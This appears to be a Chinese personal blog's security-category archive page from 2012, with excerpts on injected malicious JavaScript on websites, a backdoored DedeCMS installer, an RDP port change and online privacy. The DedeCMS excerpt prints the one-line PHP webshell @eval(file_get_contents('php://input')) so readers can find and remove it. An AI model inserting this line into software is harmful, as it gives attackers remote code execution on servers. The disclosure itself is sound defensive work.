分类目录归档:网络安全

网络安全-描述网络上的攻防对决,没有硝烟的战争。

Web应用漏洞的大规模攻击案例分析

文章来源:知道创宇

当一个流行的Web应用漏洞碰到充满想象力的Web Hackers,会产生什么化学效应?

By GreySign@Yunnan:2012/3/20

我们常常听闻各种Web漏洞被发现、被利用、被大肆宣传,或许安全厂商们都多多少少有点让用户们觉得这只是恐吓营销的手段,

但我们从不这么认为。

从我们的团队创立至今,分析、深入追踪过的案例大大小小已经数不清,但我们也相信,这些被发现的精彩的大规模攻击、APT攻击(当最初我们看到各种高级攻击的时候,还不知道如何称呼它们)只是冰山一角,浮出水面的每个事件,在经过各位安全研究员的深入分析,都足以拍成一部电影。

Anonymous对全球白帽子下了3月31日瘫痪DNS根服务器的挑战书的时候,我相信在这个互联网上大隐于市的高手们经已蓄势待发,默默捍卫承载着无数梦想的国度。与此同时,我们也在贡献着力所能及的微薄力量,时刻响应来自客户、来自国家、来自互联网那些需要我们帮助的安全事件。

在最近一段时间,我们发现了一个大规模攻击,与各位共享一下这个有意思的追踪过程。

 一段神秘的JS

最初的时候,我们发现客户的网站的js里都嵌入了一段加密后的脚本,虽然加密、压缩、代码混淆也时常是JS开发者压缩代码、保护代码的手段,

不过仔细看看解密后的代码,往往会有一些精彩的故事在里面。

用浏览器或其他工具看客户网站上的脚本(如:http://a.com/wp-includes/js/jquery/jquery.js?ver=1.6.1),在文件底部发现:

 

此时,我顺便看了看其他存放在本站的脚本文件,也全部被感染,插入了一样的脚本,

看上去这像是自动化的批量插入的代码,我对它进行了解密: 继续阅读

织梦官网安装包再次被植入一句话木马

织梦内容管理系统一直以方便快捷强大而著称,但是这次..就连官网也受到影响…

最新消息,其实我是在微博上看到有人发布了这个消息。

织梦V5.7SP1版本安装包内被人植入了一句话木马。

我自己亲自去测试了一下,果真,被人植入了一句话木马。

所幸的事,我管理的两个网站并没有被植入(是因为之前早些日子被下载的原因吧!)

木马位置在uploads->include->shopcar.class.php文件中的第32行。

连官网都被日了- -最近下载了织梦并且传上服务器的朋友,要小心了。。

修复方案:删除@eval(file_get_contents(‘php://input’)),以及针对服务器进行全面的扫描杀毒。

新浪爱问共享资料下载积分绕过

其实这个是很早就发现有的一个bug。

可能很多人都知道,也有人说,这个没什么大碍,发布了也没意义。

在我看来不是这样的,既然他本身要积分,那么就是对共享资料者的一种知识产权的尊重。

如是说来,还是要针对这个漏洞进行上报。

目前已经提交给@乌云处理。

细节请关注:http://www.wooyun.org/bugs/wooyun-2010-05369

修改3389端口的方法一则

针对目前频发的安全事故,以及最近经常流行ms12-020漏洞以及其修改版。

结合这个漏洞,有某位师兄给了我一些防范的建议。

第一是对服务器更新开启自动更新。

第二是对3389远程登录端口的修改,这里我在网上找了一个方法,目前我修改已经成功,拿出来和大家分享。

总共有两个步骤:一是修改服务器端的端口设置;二是客户端连接方法。方法如下(以Windows Server 2003为例,其它系统仅供参考):

一、修改服务器端的端口设置(注册表有2处需要修改) 继续阅读

IP突破20..纪念一下吧..

在昨天,发布了网易的那篇文章之后,我的博客流量大增- -。

直接去了20IP+了,表示感到很欣慰,开这个wordpress到现在为止,没有上过15的。。。能上20很开心了。

原本只想着能分享也是一种快乐,但这次给了我很大的鼓舞。

话又说回来了,明天是实名制的第一天,不知道各位有没什么感想呢?

我个人分享下我的感觉。实名制在如今试用期间,必定出现N++的问题(各种不解释,想知道的问百度)。

我本人也测试了一下,利用搜索引擎来搜索信息,几乎很轻易的就获取了N个人的身份证、手机号、学号、工号等等。

更不要说以后的实名制了,在如今未实名制的情况下都如此糟糕,可想而知,未来是多么的糟糕。

建议各位以后还是考虑下隐私问题吧。。非必要的情况下,请勿把重要个人信息填写在网上,以免被脱裤之后的各种麻烦。。

最好的例子不过是CSDN程序员网站被人脱裤的悲剧了。

还是那句话,安全无小事,注重自身安全,防范于未然。